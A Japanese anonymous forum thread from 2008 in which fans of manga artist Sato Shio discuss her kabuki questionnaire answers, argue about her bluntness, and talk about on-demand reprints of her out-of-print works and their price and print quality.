「慙紅葉汗顔顔見勢」を観て(ry

五、年に何回くらいご覧になりますか?
五、六回です。

九、こんな話や、事件、史実から歌舞伎になる!と思われるものを教えてください。
卑弥呼、須佐乃男、木乃花咲耶姫とか、古事記の世界もおもしろいんじゃないですか。

801 :花と名無しさん:2008/03/28(金) 16:27:52 ID:???0
佐藤史生 (漫画家)

一、歌舞伎をはじめて見たきっかけはなんですか?
友人がチケットを手配してくれたんで。

二、いちばん興味をひかれた演目は何ですか?
比べるほど数を見ていません。

五、年に何回くらいご覧になりますか?
十年に一度か二度。

六、お好きな役者のベスト3は?
そこまでみていない。
若い役者はみてたのしいが。

七、「あれが見たい!」と思う演目と理想の配役は?
そこまで知らない。

九、こんな話や、事件、史実から歌舞伎になる!と思われるものを教えてください。
古事記や日本書紀の世界ですな。
ヤマトタケルの他にも。

十、歌舞伎は大衆芸能だと思いますか?
チケットの値段さえ考えなければ。

802 :花と名無しさん:2008/03/28(金) 16:32:27 ID:???0
>>790-791
アドバイス感謝。
要約…ではないけれど、見所をうpしてみました。

803 :花と名無しさん:2008/03/28(金) 18:03:10 ID:???0
佐藤さんの正直さにワラタw

804 :花と名無しさん:2008/03/28(金) 19:14:15 ID:???0
>>799->>801
おお!ありがとう!

媚びないところが笑えるw
こんな風情の人だってこと、読めてとても嬉しいw



805 :花と名無しさん:2008/03/28(金) 19:27:50 ID:???0
テキスト起こし乙です>>799-801

806 :花と名無しさん:2008/03/28(金) 20:17:29 ID:???0
すごく面白かったです
ほんとよく載せましたねそれw

807 :花と名無しさん:2008/03/28(金) 20:39:39 ID:???0
新書館以外は難しそうだなー


808 :802:2008/03/28(金) 20:56:07 ID:???0
喜んでいただけて幸いです。

ご存知のとおり、木原敏江さん(>>799)は
「妹背山婦庭訓」「桜姫東文章」を元にした作品を発表されましたし、
南朝秘史ものも手がけていられます。

「古事記」を挙げられた美内すずえさん(>>800)は、
この雑誌と同じ年に「アマテラス」を連載開始されています。

御二方とも、作品が舞台化されているのも共通点ですね。

ということで、佐藤史生さんにも是非是非、「古事記」「日本書紀」ワールドで新作を!そして、舞台化を!
などと望んでしまうのですが…

アッサリさんですよねぇ…



809 :花と名無しさん:2008/03/28(金) 23:06:56 ID:???0
801さん乙です

でも、これ初手から編集のミスキャストだったんじゃないかなw
佐藤さんは要するに、
「見たことはあるけど、あんまり興味ないな(or 高くて手が出ない)」ってことのようだし

810 :花と名無しさん:2008/03/28(金) 23:08:19 ID:???0
あるいは、「これから見るつもりだけど、まだ全然知らない」ってところかな

811 :花と名無しさん:2008/03/28(金) 23:12:22 ID:???0
うーん。佐藤さん、漫画はすごく好きなんだけど
「竜の夢その他の夢」のインタブーとか読んで正直
ちょっとイタイ人かも、と思った

812 :花と名無しさん:2008/03/29(土) 00:28:33 ID:???0
元祖KY?w
でもそこがクールでちょとカッコイイ。。イリスや馬鳴の原点ってかんじすかね。

813 :花と名無しさん:2008/03/29(土) 01:04:01 ID:???0
>>796
黒塚というよりできそこないの秘密の花園に大層気を悪くしたのであります、だっけか
なつかしい

814 :花と名無しさん:2008/03/29(土) 10:25:18 ID:???0
>>812
とゆーより、名前忘れたけど、一歩間違えるとあの若手女優みたいw

記名アンケートや取材等を受けるのであれば、
正直でさえあればいいってもんじゃない、と自分は思う
まあ、佐藤さんのスタイルってんなら、それはそれでいいけれど

815 :花と名無しさん:2008/03/29(土) 10:29:09 ID:???0
>>811
814だけど、あのインタビューにそんな印象は持たなかったなぁ
「説明しすぎだなぁ」と思ったところはあるけどw

816 :花と名無しさん:2008/03/29(土) 13:01:30 ID:???0
きっと当時は若かったから、というのもあるんでは〜
あーお花達の巻頭ショートでいいから描いてくれないかな・・PCに関するエッセイとか

817 :花と名無しさん:2008/03/29(土) 14:24:50 ID:???0
最近は、KYといわれたくないがために、おためごかしでウソをつくことまでしなくてはいけないの?

もし、この率直さが雑誌の雰囲気を壊しているのなら、
アンケートを掲載する判断をした編集側のミスだろう

818 :花と名無しさん:2008/03/29(土) 16:15:00 ID:???0
誰もそんなこと言ってないけど…?

819 :花と名無しさん:2008/03/29(土) 16:54:31 ID:???0
まあまあ。佐藤さんへの思いの深さゆえ‥なんでしょう、きっと。
このメンタリティがあの作品群を生み出したと思うと感慨深いです。

820 :花と名無しさん:2008/03/29(土) 18:06:25 ID:???0
>>818
>>814

821 :花と名無しさん:2008/03/29(土) 20:30:37 ID:???0
>>817
えーとね

1行目
誰も、本当にそんなこと言ってないよ

「KY」とかゆー簡単な単語で何でも片づけるなよ

822 :花と名無しさん:2008/03/29(土) 22:09:02 ID:???0
>>821
えーとね

文意、読みとれてないのかな?

>>811>>814に、"イタイひと"や"KY"で片づけるなと書いているのだけどね


823 :花と名無しさん:2008/03/29(土) 22:49:59 ID:???0
言いたいことはわからなくもないが、
817の書き方じゃ伝わらんと思うよ

824 :花と名無しさん:2008/03/29(土) 23:39:59 ID:???0
みんあ真面目なんだなあ

825 :花と名無しさん:2008/03/30(日) 00:21:07 ID:???0
>>823
>>817で伝わらないなら、読解力、理解力の問題だろうなぁ

以下に蛇足の解説をしてみましたが、こんなシンプルな内容なのに、
なぜ「伝わらない」ということにしたいのか、理解に苦しみますね

単に、耳をふさいでいるだけでは?
反論があるのなら、どうぞ


"KY"多用世代の沢尻の名前をだした上での
>>814
> 記名アンケートや取材等を受けるのであれば、
> 正直でさえあればいいってもんじゃない、と自分は思う
> まあ、佐藤さんのスタイルってんなら、それはそれでいいけれど

これを受けて、
>>817
> 最近は、KYといわれたくないがために、おためごかしでウソをつくことまでしなくてはいけないの?

"正直でさえあればいいってもんじゃない"に対して、
"ウソをつくこと"に疑問を呈した前段

後段は、最終責任は編集側の判断にあるだろうということ



826 :花と名無しさん:2008/03/30(日) 00:46:19 ID:???0
>817は理解できるが>825は意味わからん件
頭に血が上っている時は文章を書かんほうがいい

まあ、最近の世の中ではKYであることが許されざる罪悪であるという
狭いものの見方が席巻しているのが残念な事実ではある
佐藤さんの場合「読めない」ではなく「読まない」じゃないかと思うけどね
作家としては世間に迎合することばかり考えてる人より
そういう人のほうが面白いものを描きそうな気がするな

つか、個人的にはこの愛想のなさよりも
こんなに興味なさげな分野のアンケートに
すこぶる真面目に回答しているのがおかしい
それをそのまま掲載しちゃう編集者もどうかしていて笑える

827 :花と名無しさん:2008/03/30(日) 00:58:49 ID:???0
関係ないがKYというのは朝日の珊瑚事件専用にしときたい自分

828 :花と名無しさん:2008/03/30(日) 01:37:03 ID:???0
>>822
>>811ですが、「竜の夢〜」のインタビューに関して私は
KYとか正直過ぎとか言ってないですよ。
一緒くたにしないでね〜

829 :花と名無しさん:2008/03/30(日) 09:19:40 ID:???0
このスレにしては珍しい流れだね

830 :花と名無しさん:2008/03/30(日) 11:17:16 ID:???0
>>827
自分も、KYというとあの事件を思い出す
自分の中で朝日が地に落ちた瞬間


831 :花と名無しさん:2008/03/30(日) 11:18:25 ID:???0
>>822
文意が読みとれてないのは君でしょう
811や814の内容を曲解してるみたいよ

832 :花と名無しさん:2008/03/30(日) 11:31:46 ID:???0
>>817さんへ

>>811さんは"イタイ人かも?"と思いつつでも好きで
>>812さんは"元祖KY?w"と思いつつでもそこがクールでカッコイイと思ってるし
>>814さんは"一歩間違えると"あの若手女優かもしれないけど間違えて無いと思ってるし

"おためごかしでウソをつくことまでしなくてはいけない"
なんて誰も思って無いんです。

みんな仲良く v(・∀・)v

833 :花と名無しさん:2008/03/30(日) 11:38:53 ID:???0
まだやってるのか・・・

834 :花と名無しさん:2008/03/30(日) 14:13:05 ID:???0
>>826
頭に血がのぼるほど感情は動いていませんよ。
軽はずみな言葉遣いの人や理解力のない人が多いのには慣れていますから。

できたら、「具体的に」どこが理解できないのか教えてくれませんか。

ここまでレスを読んでいても、「伝わる、伝わらない」としかなく、
これではどうも抽象的すぎ、単に自分の感情を表現するだけで、
なにか「伝える」努力をされているように思えないのですよ。
こちらは、なんとか具体的に説明しようとしているのですが。

>>831
曲解をしているというのがあなたの意見なら、ちゃんと「具体的」に説明してくださいね。
それでは、ただの書き捨てと同じですよ。


835 :花と名無しさん:2008/03/30(日) 14:15:25 ID:???0
>>832
すでに>>825でも書きましたが、
>>814
> 正直でさえあればいいってもんじゃない、と自分は思う

この方は、"ウソでもいいから依頼者の空気を読んだ回答"の方が望ましいと書かれている訳です。
それに対しての"おためごかし〜"という文章です。

そもそも、なぜ、「イタイひと」「KY」という言葉を引き合いにだして遣ったのか。
その後のフォローのような文章が"本心"なら、
単に「クールでカッコイイ」と書けばいいことでしょう。

これは、"KY"と認定されることを恐れる風潮に毒されているからでは?

「一歩間違えると」という言葉に、すべて表されていると思います。
"KY"と"非KY"の境界を設定し、自分自身が「内」と「外」を"認定"することで、
自分と自分の愛する者は「内」側に置き、安堵感を得る。

余談ですが、この種の構造を吹きとばしたところに、
「クールでカッコイイ」ものがあると自分は考えるのですが、
クールさを評するのに、この構図に頼らなければいけないものなのでしょうか。

>>833
有耶無耶にする方がよほど害毒ですから。
目障りだとお思いなら、スルーで。

836 :花と名無しさん:2008/03/30(日) 14:35:27 ID:???0
困った人にゃー
常に裏目に読んだ思い込みを正しいと思ってしまう人だとはー。トホホ。

とりあえず
「正直でさえあればいいってもんじゃない」

「ウソでもいいから依頼者の空気を読んだ回答」
をイコールだと思い込んでしまうのはどうかと思うよ

837 :811:2008/03/30(日) 15:08:10 ID:???0
ごめんなさい。
佐藤先生は>>835にくらべたら全然イタくなんかないです。
訂正してお詫び申し上げます。

838 :花と名無しさん:2008/03/30(日) 15:32:22 ID:???0
つか誰と誰が何を巡って喧嘩してるのか理解するのが面倒だw



あー画集含めた豪華版全集発売&長編連載開始しないかな

839 :花と名無しさん:2008/03/30(日) 15:55:23 ID:???0
すみません。
>>811さんの、
>「竜の夢その他の夢」のインタブーとか読んで正直

これは「竜の夢(ry」に収録されているのですか?
手に入らず未読のため、気になります。
流れとは微妙に違う質問なので、もし迷惑なレスでしたら申し訳ないです。

840 :花と名無しさん:2008/03/30(日) 17:39:54 ID:???0
むしろ本流だと思われ

841 :811:2008/03/30(日) 18:07:05 ID:???0
>>839
そうです。
私も今は手元にないので、うpとかはできませんが・・・

842 :花と名無しさん:2008/03/30(日) 20:44:57 ID:???0
>>840-841
そうですか!ありがとうございます。
竜の夢、ネットでしか手に入らない田舎だけど、高いですよね。
>>838
この際、小説でもエッセイでもいいw

843 :花と名無しさん:2008/03/30(日) 21:27:32 ID:???0
なんか荒れてるから、別の燃料投下

グレープフルーツ14号で佐藤先生が推薦している
「女性のためのSF小説スペシャル」全11冊
3ページに渡って解説してます。

・闇の左手
・風の十二万位
・クルーイストン実験
・塔の中の姫君
・パーンの竜騎士
・色褪せた太陽
・琥珀の瞳
・楽園の崩壊
・遥かなる光
・妖女サイベルの呼び声
・鼠と竜のゲーム

GFは手元に全冊あるので、
ttp://ww1.tiki.ne.jp/~quelmal/interview.html
とかで気になる記事があったらリクエストどうぞ

余裕があればアップなり転載なり要約なりします

844 :花と名無しさん:2008/03/30(日) 21:47:26 ID:???0
スレ伸びてると思ったら、なんかすごいのが来てたのね。

「KYといわれたくないがために、おためごかしでウソをつくのは馬鹿らしい」ってなことを
主張したいために、佐藤さんをダシに使って談義してたのね。
でもやっぱこういう人は空気読む努力したほうがいいと思うんだ、回りがすんごく迷惑するし。

845 :花と名無しさん:2008/03/30(日) 23:48:43 ID:???0
「妖女サイベルの呼び声」って岡野さんが漫画化した「コーリング」の原作ですよね。
あの作品はとても良かったけど、佐藤さんに機会があったならどう描いたかなあ…
イメージイラストでいいから見たかったなあ。

846 :花と名無しさん:2008/03/31(月) 01:34:20 ID:???0
>>844
KYとかいうレベルじゃないと思われ



つーか皆さま、辺なのに構ってしまって済みませんでした
まさかここまでとは思わず…
次は気をつけます

847 :花と名無しさん:2008/03/31(月) 19:00:20 ID:???0
>>844
空気ではなく、
文意や行間の意味がとれてなかったのだと思う

848 :花と名無しさん:2008/03/31(月) 19:05:14 ID:???0
>>843
わははー
「闇の左手」しか読んだことがない自分に大笑い
くそう、これから読んでやるw

で、
佐藤さんは性別(あるいは性差)にこだわっている作家の一人だと思うので、
「闇の左手」にどんな解説をしていたのか非常に気になります
よければ、どんな回答だったか教えてください


849 :花と名無しさん:2008/03/31(月) 19:43:03 ID:???0
佐藤史生の名言は、キャベツ畑の「ひとつでいい、ひとつで」だと思う。

850 :花と名無しさん:2008/03/31(月) 22:14:14 ID:???0
>>848
最初は要約しようと思ったんですが、無理でしたw

ttp://www.h-navi.net/bbs/img/11744772590569.jpg
1M以上のでかい画像なんで、スクロールする必要があるかも

851 :花と名無しさん:2008/03/31(月) 22:42:14 ID:???0
>>850
848です。どうもありがとう!

「闇の左手」はあの静謐な流れが気に入ったのかな
自分は、せっかくのこんな面白い設定、もっとなんかこー誰か何とかしてくれ!と思ったのだが
(例えば佐藤さんにw)

最初の三段論法には異論あり!……だけど、あのへんは単なる枕かテレ隠しかな

852 :花と名無しさん:2008/03/31(月) 22:49:57 ID:???0
確かに闇の左手は設定がすごく良かった。
もっと風呂敷を広げて長篇に出来そうなのに、短篇にしとくのもったいないと思った。

853 :花と名無しさん:2008/04/01(火) 00:32:34 ID:???0
いちおー長編だったと思ったが

854 :花と名無しさん:2008/04/07(月) 15:49:29 ID:???0
>>850
乙です。100万回保存しました。

855 :花と名無しさん:2008/04/13(日) 20:07:48 ID:???0
精霊王のジョナサン・ヒンクリーの異母妹(?)のアレックスの話を
読んでみたかったなあ

856 :花と名無しさん:2008/04/15(火) 22:45:04 ID:???0
ネモの名はノーチラス号の艦長から取ったんだろうか。

857 :花と名無しさん:2008/05/03(土) 14:01:15 ID:???0
ワン・ゼロを読み返してたら馬鳴がコンピュータって言ってるのに感動した。
あの当時、普通は「コンピューター」って言ってたよね。
メモリはメモリーでプリンタはプリンター。
80年代終わり辺りから語尾の「ー」が省略されてった覚えがある。

858 :花と名無しさん:2008/05/03(土) 20:02:42 ID:???0
理系や工業系では3字以上のカタカナ語表記のとき音引を省略するのがデフォ

859 :花と名無しさん:2008/05/03(土) 21:23:11 ID:???0
昔っからそれがデフォなのか。
作者が省略の先駆者組なのかと思った。
一つ豆知識が増えたよ。ありがとう。

860 :花と名無しさん:2008/05/03(土) 21:44:15 ID:???0
トランジスタ技術とかの雑誌がそういう記述で書かれているからね。
あれって名称の省略方法ガイドラインとかきちんと制定されてるんだよね。
以前トラ技で規定ルール読んで感心したことある。

861 :花と名無しさん:2008/05/04(日) 02:07:55 ID:???0
コミックスカバーの解説では「異色のコンピューターSF」って
なってるw

862 :花と名無しさん:2008/05/05(月) 10:21:23 ID:???0
ただの「ー(音引き)」の表記統一ってだけの話

別にどちらが正しいかってことじゃないんで、
どうでもいいっちゃどうでもいい




863 :花と名無しさん:2008/05/05(月) 17:12:21 ID:???0
ただのどうでもいい話を楽しくしてるだけでしょ
誰もどっちが正しいとか言ってないのよ

864 :花と名無しさん:2008/05/05(月) 23:04:58 ID:???0
最近の一連のスレの流れが面白かったんで
久しぶりに「竜の夢…」を押し入れから引っ張り出して読んだ
インタビューに関しては、正直若いなあ、という感じ
80年代の業界内輪ウケのノリを、外から見たら感じる程度のイタさだった
むしろ前後の設定やらウラ話を惜しげもなく語っているので
「イタくても何でもいいから、それをマンガで描いてください!」という思いの方が
強かったw
空想非科学マンガでも退屈のきわみでもいいから、と
今でもやはりそう思う

そういえばレコードも持ってたんだが……もうプレイヤーがないなあ


865 :花と名無しさん:2008/05/06(火) 09:07:06 ID:???0
>>863
一連のやりとりを見ていて、

調べもせず、すぐに「先駆者」と思い込んでしまうあたり、
ちょっとこわいものがあるな

と思った

>>864
確かにコメントは「青い」って感じだったね
ただ、あの本じたいも佐藤さんも非常に特殊なイメージがあるんで、
同人仲間に言い訳してるみたいで、それはそれでいいのかな、とも思った


866 :花と名無しさん:2008/05/14(水) 01:33:32 ID:???0
ホシュ

867 :花と名無しさん:2008/05/20(火) 16:21:53 ID:???0
新作描いて欲しいがしばらくブランクがあるとどうだろう?
絵が劣化したりしていないだろうか?

868 :花と名無しさん:2008/05/21(水) 17:35:41 ID:???0
発表するしないはともかく、
全然描いてない状態で突然描いたら腕は落ちてるでしょ

万一、新作発表するなら“リハビリ”するとは思うけど

869 :花と名無しさん:2008/05/21(水) 21:47:38 ID:???0
マンガ描くって体力もいるそうだから。ブランクと年に勝てるだけの情熱を取り戻せるかが勝負。

870 :花と名無しさん:2008/05/21(水) 23:22:19 ID:Pxs5DRkw0
絵は描いてるんじゃないかなー
知り合いの漫画家のアシしたって書き込みあったよね?

しかし、日々どういう生活しているかなー 聞いてみたい

871 :花と名無しさん:2008/05/22(木) 18:35:20 ID:???0
アシスタントだからって、ペン入れしてるとは限らないかもよw
消しゴムかけとかベタとか、トーン貼りとかメシスタントとか

872 :花と名無しさん:2008/05/23(金) 02:30:43 ID:???0
そんなw
普通に小物とか背景描いてることにしてくれw
でも人間も描かないと腕は落ちそう

873 :花と名無しさん:2008/05/23(金) 09:57:33 ID:???0
何年か前に坂田さんが同人本出した時に、
写植を手伝って感謝されたみたい。
そういう類ではないかと。

874 :花と名無しさん:2008/05/23(金) 10:01:07 ID:???0
たとえ人物にペンを入れてるとしても、
しょせんは人の漫画に入れるものでタッチ等は似せるはずだから、
リハビリにならないんじゃないかなぁ

っつーか、佐藤さん(とか諸星大二郎さん等)の人物絵は独特すぎて、
アシには不向きな気がするw



875 :花と名無しさん:2008/05/23(金) 10:09:33 ID:???0
そういや、佐藤さんの作品に奥友さんが脇キャラをアシしていたけど、違和感なかったな。
奥友さんも好きだったんだけど、今どうしているんだろう。

876 :花と名無しさん:2008/05/23(金) 16:24:01 ID:???0
アレフレーデン1以降知らない

877 :花と名無しさん:2008/05/26(月) 07:16:05 ID:???0
京都国際マンガミュージアムでまた展覧会あるみたいよ
と思ったら>>500と同じやつか。
インタビューも展示されるのかな。
ttp://www.kyotomm.com/2008/05/shojo_manga_power.php

878 :花と名無しさん:2008/05/28(水) 00:44:06 ID:???0
明日休みだから早速行ったろと思ったら7月からなのね >877
待ち遠しいな。

879 :花と名無しさん:2008/06/04(水) 22:32:35 ID:S0F2iTBfO
京都といえば、鳥図明児さんの作品展も8月にあるとか

880 :花と名無しさん:2008/06/04(水) 23:09:05 ID:???0
トトくん まだ漫画家やっとられるんだっか

881 :花と名無しさん:2008/06/05(木) 12:13:46 ID:???0
そーいえば、そんな漫画家もいたなぁ

と調べてみたら、奈良女子大の出身だったのか
優秀なのね……ってか、女性だったことを知らなかったので驚いた

882 :花と名無しさん:2008/06/05(木) 23:33:31 ID:???0
取り図さんの単行本に佐藤氏が後書き書いてるな
数学専攻だったとか・・・

883 :花と名無しさん:2008/06/06(金) 01:28:47 ID:???0
8タイトル復刻したみたいなのでお知らせ
ttp://www.comicpark.net/

884 :花と名無しさん:2008/06/06(金) 20:08:17 ID:???0
>>883
新書館の分は入っていないのね・・・(´・ω・`)

885 :花と名無しさん:2008/06/13(金) 20:29:10 ID:???0
持ってるけど買いたくなるのはなぜだ・・・!

886 :花と名無しさん:2008/06/13(金) 22:39:18 ID:???0
>>883
わかりずらいから復刻したのまとめた。

「鬼追うもの」「夢みる惑星」「ワン・ゼロ」「打天楽」「チェンジリング」「精霊王」「心臓のない巨人」「魔術師さがし」

全部小学館のだね。正直1冊945円は高いと思う(´・ω・`)

887 :花と名無しさん:2008/06/14(土) 01:09:10 ID:???0
装丁がアレなんだよね・・・

888 :花と名無しさん:2008/06/14(土) 02:10:33 ID:???0
奈良女子大って近畿では名門なんですか?

889 :花と名無しさん:2008/06/14(土) 02:43:10 ID:???0
>888
歴史があるし、昔は真面目なお嬢さんが勉強しに行くところ、ってイメージだったのでは

890 :花と名無しさん:2008/06/14(土) 02:46:23 ID:???0
>886,887
利用したことないけど見たところペイパーバックみたいな感じなのかな
製造過程を考えるとこの値段はしょうがない気がするが
小学館のは比較的新しいか文庫化されていたりするので
古本屋でも入手しやすいし、そういう意味では割高感があるね

佐藤本で一番のプレミアはやっぱ竜の夢…だろうか
そういや展覧会で読書コーナーに置いてあったから
読んでない人にはいい話かも
京都での展示で落書きノートのページがロレンスでなかったら
見に行った人は是非レポしていただきたい

891 :花と名無しさん:2008/06/14(土) 08:00:49 ID:???0
>888
戦前は、全国に二校しかない官立の女子高等師範学校だったうちの1校。
当時の女子教育の国内最高峰ということになる。
東京女子高等師範学校は今の御茶ノ水女子大。
奈良女子大は元の奈良女子高等師範学校。
現代の近畿では?お嬢さんっぽい感じはしない。
むしろ、遠方のお勉強少女の受験先の選択肢の一つくらい?


892 :花と名無しさん:2008/06/14(土) 10:01:45 ID:???0
>>891
それって、まんま鳥図さんやん。

893 :花と名無しさん:2008/06/14(土) 10:27:04 ID:???0
そういやそうやね。


894 :花と名無しさん:2008/06/14(土) 10:51:41 ID:???0
>>886
部数が少ないから、単価が上がるのはしょうがない
というより、
復刻されただけでありがたいってもんだ

高くて嫌なら、Bookoffをこまめに回ってごらん
古い本だからたいてい100円コーナーにあるよ


895 :花と名無しさん:2008/06/14(土) 13:43:18 ID:???0
確かにPFコミックスはブクオフ気長に探せば大方は見つかるね
ただしチェンジリングだけはいくら探しても全くダメだ
上の方の復刻版買ってもいいんだけど、ここまで来ると
もう意地と言うか何と言うか

COMIC BOXの佐藤史生特集号まで入手したのに
これだけが・・・これだけがッ!

896 :花と名無しさん:2008/06/14(土) 13:59:41 ID:???0
気持ちはわかるが、
せっかく復刻されたのだし、佐藤さんのためにもなるんだし、
とりあえずは復刻版で手に入れたらどーだい?

また後日、見つかったら買えばいいじゃん?


897 :花と名無しさん:2008/06/14(土) 14:21:11 ID:???0
COMIC BOXの佐藤史生特集号!
何年、いや十数年か!?昔に古書店でみかけたんだが
結構いい値段してたから、今度来た時に買おうと買わずに帰ったら
次に行った時はもう無くなってて泣いた。
需要少ないと思って油断してたあの頃・・・

898 :886:2008/06/14(土) 21:59:35 ID:???0
>>894
え、私は元から全部持ってますよ?
カバーも無いのにその値段なのね、と思っただけです。
安価ならダブって買うつもりだったけどやめただけ。
復刻されたのはいいことだから、持って無い人にはいいと思いますよ。

899 :花と名無しさん:2008/06/14(土) 22:27:51 ID:???0
全部買って読んだけど現在ありかが不明。さあどうすっか。

900 :花と名無しさん:2008/06/14(土) 23:36:11 ID:???0
>>899
(´・ω・`)人(´・ω・`)

901 :花と名無しさん:2008/06/14(土) 23:47:45 ID:???0
広いおウチでがんすね

902 :花と名無しさん:2008/06/15(日) 00:29:19 ID:???0
狭くても深い階層というものが存在してだね・・・・

903 :花と名無しさん:2008/06/15(日) 00:42:30 ID:???0
>>899-900
(´・ω・`)人(´・ω・`)人(ヽ'ω`)

大切な順番に本をなくす傾向にある
幾冊と買ってはなくし買ってはなくし


904 :花と名無しさん:2008/06/15(日) 20:42:38 ID:???0
本に限らず、モノでも書類でもそうだね。大切なものはよく取出して見るのでついしまうのを
おろそかにすると散乱してく。いらないものは出さないからいつまでも残る。。。

905 :花と名無しさん:2008/06/16(月) 15:20:13 ID:???0
>>899
自分なら、とりあえず買う

906 :花と名無しさん:2008/06/18(水) 15:06:50 ID:???0
某王国の7巻を>>883で買ったけど
印刷は素人目にもよろしくない。

読めたら嬉しい人向けだと思う。

907 :花と名無しさん:2008/06/18(水) 22:02:33 ID:???0
復刻版だから、そういう場合もあるだろう

原画がないのかもしれないし、といって印刷所の古い版下はとっくに処分したろうし、
そーなると、
製版フィルムか印刷物からおこしたものとかね

それとも、そこの復刻版はすべて粗悪な仕上がりなのか?


908 :花と名無しさん:2008/06/18(水) 22:09:44 ID:???0
>>906
今見てきたがその巻は特殊な事情があるみたいなので
原稿が残ってる作品ならそういう問題はないかも知れないね

そういえば佐藤さんの場合は雑誌に掲載された作品は
一応全部単行本になっているのかな

909 :花と名無しさん:2008/06/21(土) 17:24:57 ID:???0
値段が高くて粗悪な印刷か・・・
いくら欲しくても悩むな、それは。

910 :花と名無しさん:2008/06/22(日) 11:57:50 ID:???0
荒巻圭子の「GENOMES」、
オンデマンド印刷の再版本を買ったけど
目も当てられないってほどじゃなかったよ。
佐藤さんのも読みたいなら買ってもいいと思う。
スクリーントーンの中間色調がほとんどツブれたり
カスレたりしてるのはたしかに気になったけどね。

GENOMESは版下や元原稿がもうなくなってて、
雑誌に掲載されたのをスキャンして再版してたので、
当時のアオリとかがそのまんま載ってた。

911 :花と名無しさん:2008/06/22(日) 14:48:52 ID:???0
>当時のアオリとかがそのまんま載ってた
せっかくの再販なんだからそういう時代を感じさせる部分を残しておいてくれると
別の楽しみがあっていいな

912 :花と名無しさん:2008/06/22(日) 15:01:01 ID:???0
むしろお得感があると自分もオモタw

913 :花と名無しさん:2008/06/22(日) 17:59:19 ID:???0
>>909
ちゃんと>>907-908>>910を読んでみよう

914 :花と名無しさん:2008/06/23(月) 00:40:17 ID:???O
>荒巻圭子の「GENOMES」
おー、懐かしい。アフタで未完だったのを、オンデマンドて完結させたんだよね。懐に余裕があったら買って読みたい。

昔の音楽の復刻でも、マスターテープが残ってなくて、ファン所有のLPを音源にする事があるらしいよ。

915 :909:2008/06/25(水) 17:07:49 ID:???0
>>913
うん、それもわかってるんだけどね。
荒さの程度にもよるけど
自分は視覚的な部分が気になるから
読んだら凹みそうな気がするんで
地道に古本で探す方がいいかもと思ってね。


916 :花と名無しさん:2008/06/25(水) 17:12:54 ID:???0
それはそれで御自由に

ただ、復刻版というものの意味を考えれば、
「クオリティが悪いならイラネ」という無神経な発言は慎んでほしい

917 :909:2008/06/25(水) 21:53:22 ID:???0
スマンかった

918 :花と名無しさん:2008/06/25(水) 23:54:09 ID:???0
>>916
>復刻版というものの意味を考えれば

考えればなおさら、質の悪いものを流布される事に対して危惧して当然では?
あなたの考えでは、たとえ質の悪い部分があっても復刻をしてくれた功績を考えたら黙っていろという、清濁合わせ飲むことを良しとしているようですが、言論封殺とも言えるあまりに乱暴な発言でしょう。
それに、いいことであれ悪いことであれ、話題になったほうが復刻したものの認知度をあげる役には立ってるんですよ? 気に入らないなら黙れ、触れるな、という考えは思考停止でしかないし、あなたが自治厨的な支配欲を満たすこと以外のメリットは無いでしょう。
深い考えがあっての正当な疑問を、あなたの安易な推測で「無神経な発言」呼ばわりしてしまう無神経な発言は慎んでほしいと思います。

919 :花と名無しさん:2008/06/26(木) 00:32:00 ID:???0
釣りか…

920 :花と名無しさん:2008/06/26(木) 02:09:44 ID:???0
コミックスになっていてある程度流通していたものなら
入手にさほどの困難もないのでよいのだが
雑誌に載ったきりコミックスにもならずという状態の作品であるならば
私なら多少高くても、紙面が汚くても読みたいですね
あくまで多少、ですが千円前後なら許容範囲
古雑誌を取り扱っている古書店は少ないし
店頭で探すのは困難極めるし
ネットで買うとしても古ければ古いほど高いし逆に値がつきにくいものはリストに出ないし
買えば場所とるし必要なのはそのほんの一部にすぎないし
雑誌によっては紙質が悪く保存には向かないし…
といろいろ問題があるので、単行本になってくれた方がありがたいですね

まあ佐藤さんについてはそういうのはないような気がするが

921 :花と名無しさん:2008/06/26(木) 02:19:22 ID:???0
まぁ質の悪いものを質が悪いと言うこと自体が良くないとはいわないけど
あんまりやかましいこというファンがついてる作家の作品は今後復刻敬遠されちゃうかもしれないし
文句言うにしても程々にしといたほうがいいんじゃないでしょうか。

復刻先が大手出版社で継続販売してくれそうな場合なら次回再版分から改善も望めるかもしれないが
復刊.comやオンデマンドの再版て、結局は数量限定で一時的な復刊でしかなかったりするし
作者が自腹切って同人とかで自費出版するよりはいくらかましとかいうレベルであることを考えると
あまり多くを望むのは無理めな気もするんですがその辺どうでしょうか。

922 :花と名無しさん:2008/06/26(木) 11:17:20 ID:???0
>>917
こちらこそ。きつい言い方になってしまったようですいません

923 :花と名無しさん:2008/06/26(木) 16:40:12 ID:???0
従来のコミックスと比べれば画質は劣る。
しかし、コミックスを持ってない人でも、1000円程度で入手できる。
欲しい人は買えばいいし、嫌な人は買わない。それだけの話だ。
夫婦で持ってるそれぞれの佐藤史生コミックスチェックして、二人とも持ってないのは
あとでまとめて発注してくる。
チェンジリングのコミックスなくしちゃって、でもどうしてももう一度読みたかったから、
オンデマンドや復刊.comはとても助かる。

924 :花と名無しさん:2008/06/26(木) 16:55:29 ID:???0
佐藤センセも全集とか出たらいいのにな。
萩尾望都センセみたいに。
無理か……。

925 :花と名無しさん:2008/06/26(木) 18:01:20 ID:???0
全集いいね
最近ファンになったばかりでほとんどオクや古本屋でそろえたけど、
出るなら買う…
でもハードカバーや大判でなく、一般的なコミックスの大きさがいい

と、出もしないのに注文をつけてみる

926 :花と名無しさん:2008/06/26(木) 20:50:11 ID:???0
全集、いいよね

でも、萩尾さんほどの部数が見込めないだろうから、
クオリティを保ったまま出すとなれば、
単価を上げるしかないんだよね
さらに、カラーページを挿入するなど、全集によくある付加価値を入れるためには……_| ̄|○

単価を抑えるには、紙質や印刷代を抑えるしかない
そうすると、全集のくせにクオリティが低くなり、
やっぱりまた売れなくて……というジレンマ

そういったことを考えると、上で出ていた復刻版の価格はまあ妥当なんだろうな

927 :花と名無しさん:2008/06/26(木) 21:03:10 ID:???0
たまにマイナーな小出版社がマニアックな単行本出してくれたり
するから、そういうのに淡い期待をかけるしかないかな

チクマ秀版社は潰れたね・・・

928 :花と名無しさん:2008/06/26(木) 23:31:52 ID:???0
え、筑摩書房がつぶれた? ほんと? Web見たけど特に気がつかんかった。

929 :花と名無しさん:2008/06/27(金) 00:15:48 ID:???0
そこ名前は似てるけど関係無いです

930 :花と名無しさん:2008/06/27(金) 06:57:18 ID:???O
>>923
>夫婦で持ってるそれぞれの佐藤史生コミックスチェックして

うちも結婚する時、蔵書のチェックしたなぁ。ダブりは状態悪い方を売って。CDも同様。

その頃の俺は佐藤史生なんて知らなくて、巡り会わせてくれた妻に感謝してます。


